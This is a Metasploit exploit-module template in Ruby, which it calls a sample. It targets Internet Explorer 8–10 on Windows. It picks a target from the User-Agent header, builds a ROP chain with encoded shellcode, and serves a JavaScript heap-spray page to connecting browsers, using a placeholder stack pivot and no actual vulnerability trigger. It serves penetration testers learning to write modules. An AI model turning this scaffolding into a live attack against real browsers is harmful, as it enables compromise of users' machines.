##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
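class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  # Maps the "Windows NT x.y" token of an IE User-Agent to the OS name used in
  # the 'Targets' list below. Any NT version missing from this table is treated
  # as unsupported by get_target (it answers nil, and the handler sends a 404).
  NT_VERSION_NAMES = {
    '5.1' => 'Windows XP SP3',
    '6.0' => 'Windows Vista',
    '6.1' => 'Windows 7',
    '6.2' => 'Windows 8',
    '6.3' => 'Windows 8.1'
  }.freeze

  # Set :classid and :method for ActiveX exploits. For example:
  # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
  # :method => "SetShapeNodeType",
  autopwn_info(
    ua_name: HttpClients::IE,
    ua_minver: "8.0",
    ua_maxver: "10.0",
    javascript: true,
    os_name: OperatingSystems::Match::WINDOWS,
    rank: NormalRanking
  )

  # Registers the sample's metadata, targets and payload constraints with the
  # framework. Every target uses the JRE ROP chain; target 0 ('Automatic')
  # defers the choice to get_target at request time.
  #
  # @param info [Hash] module info supplied by the framework (merged via update_info)
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Module Name",
        'Description' => %q(
          This template covers IE8/9/10, and uses the user-agent HTTP header to detect
          the browser version. Please note IE8 and newer may emulate an older IE version
          in compatibility mode, in that case the module won't be able to detect the
          browser correctly.
        ),
        'License' => MSF_LICENSE,
        'Author' => [ 'sinn3r' ],
        'References' =>
          [
            [ 'URL', 'https://metasploit.com' ]
          ],
        'Platform' => 'win',
        'Targets' =>
          [
            [ 'Automatic', {} ],
            [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
            [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
            [ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
            [ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
            [ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
          ],
        'Payload' =>
          {
            'BadChars' => "\x00", # js_property_spray
            'StackAdjustment' => -3500
          },
        'Privileged' => false,
        'DisclosureDate' => "Apr 1 2013",
        'DefaultTarget' => 0
      )
    )
  end

  # Pick the exploit target for one request.
  #
  # When the user selected an explicit target it is returned unchanged. For
  # 'Automatic', the User-Agent is parsed for the IE major version and the
  # Windows NT version, and the first target whose name contains both is used.
  #
  # @param agent [String, nil] raw User-Agent header value (nil when the client
  #   sent none)
  # @return [Msf::Module::Target, nil] matching target, or nil when the
  #   browser/OS combination is not covered by 'Targets'
  def get_target(agent)
    return target if target.name != 'Automatic'

    # A request without a User-Agent must not raise inside the listener;
    # treat it like an unrecognised browser.
    agent = agent.to_s
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    # \d+ rather than \d: "MSIE 10.0" now yields "IE 10" instead of the
    # prefix "IE 1", which previously matched the IE 10 target only because
    # String#include? is a substring test.
    ie = agent.scan(/MSIE (\d+)/).flatten[0] || ''
    return nil if nt.empty? || ie.empty?

    # An NT version outside the table (5.0, 5.2, 6.4, ...) used to fall out of
    # the case statement as nil and then reach String#include?(nil), raising
    # TypeError for such clients instead of returning "unsupported".
    os_name = NT_VERSION_NAMES[nt]
    return nil if os_name.nil?

    ie_name = "IE #{ie}"
    targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
  end

  # Build the ROP chain plus encoded payload for the chosen target.
  #
  # @param t [Msf::Module::Target] target whose 'Rop' option selects the chain
  # @return [String] result of RopDb#generate_rop_payload
  def get_payload(t)
    # Placeholder pivot bytes used by this sample; passed straight through as
    # the 'pivot' option of generate_rop_payload.
    stack_pivot = "\x41\x42\x43\x44"
    code = payload.encoded

    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      generate_rop_payload('msvcrt', code, 'pivot' => stack_pivot, 'target' => 'xp')
    else
      # Every target in this sample sets 'Rop' => :jre, so this is the usual path.
      print_status("Using JRE ROP")
      generate_rop_payload('java', code, 'pivot' => stack_pivot)
    end
  end

  # Render the page served to the browser: the property-spray helper followed
  # by the payload as a JavaScript unescape() string.
  #
  # @param t [Msf::Module::Target] target passed on to get_payload
  # @return [String] HTML document
  def get_html(t)
    # to_unescape emits the payload as %u-escaped hex, so the bytes cannot
    # terminate the quoted JavaScript string they are placed in.
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    html = %|
    <script>
    #{js_property_spray}

    var s = unescape("#{js_p}");
    sprayHeap({shellcode:s});
    </script>
    |

    # Drops two leading tabs per line. With space-indented source this is a
    # no-op; kept so the emitted markup matches the original template.
    html.gsub(/^\t\t/, '')
  end

  # HTTP request handler: choose a target from the User-Agent and serve the
  # page, or reply 404 when the browser/OS combination is not covered.
  #
  # @param cli [Object] client connection handed to send_response/send_not_found
  # @param request [Object] parsed request; only its headers and uri are read
  # @return [void]
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    target = get_target(agent)
    if target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{target.name}")
    html = get_html(target)
    send_response(cli, html, 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache')
  end
end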